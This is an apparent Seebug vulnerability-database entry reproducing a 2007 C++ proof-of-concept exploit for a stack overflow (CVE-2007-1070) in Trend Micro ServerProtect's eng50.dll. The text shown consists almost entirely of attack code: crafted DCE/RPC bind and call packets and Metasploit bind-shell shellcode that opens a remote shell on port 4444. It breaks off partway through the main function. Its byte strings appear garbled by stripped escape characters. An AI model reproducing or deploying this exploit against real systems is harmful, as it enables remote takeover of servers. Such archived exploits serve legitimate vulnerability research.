Trend Micro ServerProtect eng50.dll Stack Overflow Exploit

2007-09-06T00:00:00
ID SSV:7230
Type seebug
Reporter Root
Modified 2007-09-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /* 
 * Copyright (c) 2007 devcode
 *
 *
 *			^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 *    http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 * 
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 *    I WAS THIS HOT DAYUM
 *
 *
 */
#include <iostream>
#include <windows.h>
 
#pragma comment( lib, "ws2_32.lib" )
 
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
	"x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00"
	"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00" 
	"x88x88x28x25x5BxBDxD1x11x9Dx53x00x80xC8x3Ax5Cx2C" 
	"x01x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
	"x2Bx10x48x60x02x00x00x00";
 
/* rpc_opnum_0 */
unsigned char uszDceCall[] =
	"x05x00x00x83x10x00x00x00x08x08x00x00x01x00x00x00"
	"xE0x07x00x00x00x00x00x00x88x88x28x25x5BxBDxD1x11"
	"x9Dx53x00x80xC8x3Ax5Cx2Cx04x00x03x00xD0x07x00x00";
 
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
	"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab"
	"x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2"
	"x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca"
	"x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56"
	"x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37"
	"x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe"
	"x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde"
	"x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04"
	"xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19"
	"x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8"
	"xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81"
	"xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba"
	"x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f"
	"x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d"
	"x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04"
	"xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb"
	"x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90"
	"x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96"
	"x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02"
	"xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85"
	"x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d"
	"x7dxe0xa6xd2xabx1f";
 
void usage( ) {
	printf("
		Trend Micro ServerProtect Stack Overflow
"
			"			(c) 2007 devcode

"
			"usage: tmicro.exe <ip> <port>
");
}
 
int main( int argc, char **argv ) {
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket&